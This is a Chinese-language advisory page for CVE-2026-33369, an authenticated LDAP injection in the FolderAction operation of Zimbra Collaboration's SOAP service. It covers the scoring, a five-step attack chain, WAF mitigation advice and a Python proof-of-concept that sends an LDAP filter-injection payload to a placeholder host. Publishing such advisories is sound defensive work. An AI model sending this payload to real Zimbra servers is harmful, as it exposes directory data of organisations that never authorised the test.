CVE-2026-33369 CVSS 4.3 中危

CVE-2026-33369 Zimbra Collaboration LDAP注入漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33369

漏洞类型

LDAP注入

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Zimbra Collaboration (ZCS)

漏洞概述

Zimbra Collaboration (ZCS) 10.0和10.1版本存在LDAP注入漏洞。该漏洞位于Mailbox SOAP服务的FolderAction操作中，由于应用未能正确过滤用户输入，导致攻击者可通过构造恶意SOAP请求操纵LDAP查询。经认证的攻击者利用此漏洞可获取敏感目录属性信息，CVSS评分为4.3，属于中危风险。

技术细节

该漏洞源于Zimbra Collaboration (ZCS) 10.0和10.1版本在处理Mailbox SOAP服务的FolderAction操作时，未对用户提供的输入进行充分的净化处理。攻击者需要具备低权限账号（PR:L）并无需用户交互（UI:N）。攻击者通过网络向量（AV:N）发送特制的SOAP请求，将恶意负载注入到LDAP搜索过滤器中。由于缺乏有效的输入验证，后端LDAP服务会执行被篡改的查询。成功利用该漏洞可能导致机密性低程度（C:L）的影响，即攻击者能够从目录服务中检索非预期的敏感属性信息，但不会影响完整性和可用性。利用该漏洞的前提是攻击者必须拥有有效的认证凭据。

攻击链分析

STEP 1

步骤1

攻击者使用低权限账号登录Zimbra系统，获取有效的认证令牌（Auth Token）。

STEP 2

步骤2

攻击者分析Mailbox SOAP服务接口，锁定存在漏洞的FolderAction操作。

STEP 3

步骤3

攻击者构造包含LDAP注入语法的恶意SOAP请求（例如修改LDAP过滤器参数）。

STEP 4

步骤4

将恶意请求发送至服务器，服务器后端未过滤输入直接将其拼接到LDAP查询语句中执行。

STEP 5

步骤5

服务器返回被操纵的查询结果，攻击者从中提取敏感的目录属性信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://example.com/service/soap"
auth_token = "VALID_AUTH_TOKEN_HERE" # Obtained after login

# LDAP injection payload to manipulate the filter
# Example: trying to extract attributes or bypass logic
injection_payload = "*)(uid=*))(|(uid=*"

# Constructing the malicious SOAP request
soap_headers = {
    "Content-Type": "application/soap+xml",
    "Cookie": f"ZM_AUTH_TOKEN={auth_token}"
}

soap_body = f"""<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
    <soap:Header>
        <context xmlns="urn:zimbra">
            <authToken>{auth_token}</authToken>
        </context>
    </soap:Header>
    <soap:Body>
        <FolderActionRequest xmlns="urn:zimbraMail">
            <action op="rename" id="{injection_payload}" l="InjectedFolder"/>
        </FolderActionRequest>
    </soap:Body>
</soap:Envelope>"""

try:
    response = requests.post(target_url, headers=soap_headers, data=soap_body, verify=False)
    print(f"Status Code: {response.status_code}")
    print("Response:")
    print(response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

Zimbra Collaboration (ZCS) 10.0

Zimbra Collaboration (ZCS) 10.1

防御指南

临时缓解措施

建议暂时通过WAF设备加强对SOAP请求的检测，拦截包含LDAP特殊字符（如括号、星号、等号）的恶意流量，并加强对FolderAction操作的日志审计，直至完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表